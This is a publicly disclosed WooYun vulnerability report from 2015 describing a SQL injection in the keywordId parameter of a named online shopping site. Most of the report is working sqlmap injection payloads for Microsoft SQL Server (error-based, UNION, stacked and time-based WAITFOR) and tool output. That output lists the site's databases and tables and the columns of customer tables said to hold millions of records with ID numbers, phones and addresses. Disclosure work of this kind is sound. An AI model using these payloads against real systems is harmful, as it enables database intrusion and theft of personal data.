当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116138

漏洞标题:某商城存在注入可获取500w+用户信息和600w+商户信息

相关厂商:1mutian.com

漏洞作者: pandada

提交时间:2015-05-25 18:48

修复时间:2015-07-09 18:50

公开时间:2015-07-09 18:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

用户数据泄露,身份证手机号信息暴露。

详细说明:

GET /knowledgelist.aspx?keywordId=1&newstypeId=&productId=642 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.1mutian.com:80/
Cookie: ASP.NET_SessionId=njtdkt1ldnmtapglbxntnrar; BrowedProductList-Admin=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-16%22%3f%3e%0d%0a%3cArrayOfInt+xmlns%3axsi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema-instance%22+xmlns%3axsd%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema%22%3e%0d%0a++%3cint%3e686%3c%2fint%3e%0d%0a++%3cint%3e1878%3c%2fint%3e%0d%0a++%3cint%3e1859%3c%2fint%3e%0d%0a++%3cint%3e1427%3c%2fint%3e%0d%0a++%3cint%3e1411%3c%2fint%3e%0d%0a++%3cint%3e438%3c%2fint%3e%0d%0a++%3cint%3e396%3c%2fint%3e%0d%0a++%3cint%3e790%3c%2fint%3e%0d%0a++%3cint%3e1861%3c%2fint%3e%0d%0a++%3cint%3e1660%3c%2fint%3e%0d%0a++%3cint%3e1674%3c%2fint%3e%0d%0a%3c%2fArrayOfInt%3e; CheckCode=DHJ8J; 1=1
Host: www.1mutian.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keywordId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current user:    'ymt'
current database:    'YMTTransDb'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keywordId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [10]:
[*] CustomerUser
[*] master
[*] MobileSymbol
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] YMTShopDate
[*] YMTTransDb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keywordId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: CustomerUser
[3 tables]
+---------------------+
| CustomerInformation |
| T_DeletePhone       |
| 私人营业库               |
+---------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keywordId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: CustomerUser
Table: CustomerInformation
[15 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| id     | int      |
| mobile | varchar  |
| 使用人    | nvarchar |
| 出生日期   | nvarchar |
| 初次登记日期 | datetime |
| 卡型     | nvarchar |
| 名字     | nvarchar |
| 地址     | nvarchar |
| 套餐更改日期 | datetime |
| 性别     | nvarchar |
| 手机     | float    |
| 有效日期   | datetime |
| 证件号码   | nvarchar |
| 话费     | nvarchar |
| 邮编     | nvarchar |
+--------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keywordId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: CustomerUser
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.CustomerInformation | 5294405 |
+-------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keywordId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: CustomerUser
+-------+---------+
| Table | Entries |
+-------+---------+
| dbo.私人营业库  | 6847309 |
+-------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keywordId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: CustomerUser
Table: 私人营业库
[4 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Address  | nvarchar |
| MailNo   | nvarchar |
| TelPhone | nvarchar |
| Username | nvarchar |
+----------+----------+


数据我就不跑了吧。

修复方案:

你们懂的

版权声明:转载请注明来源 pandada@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论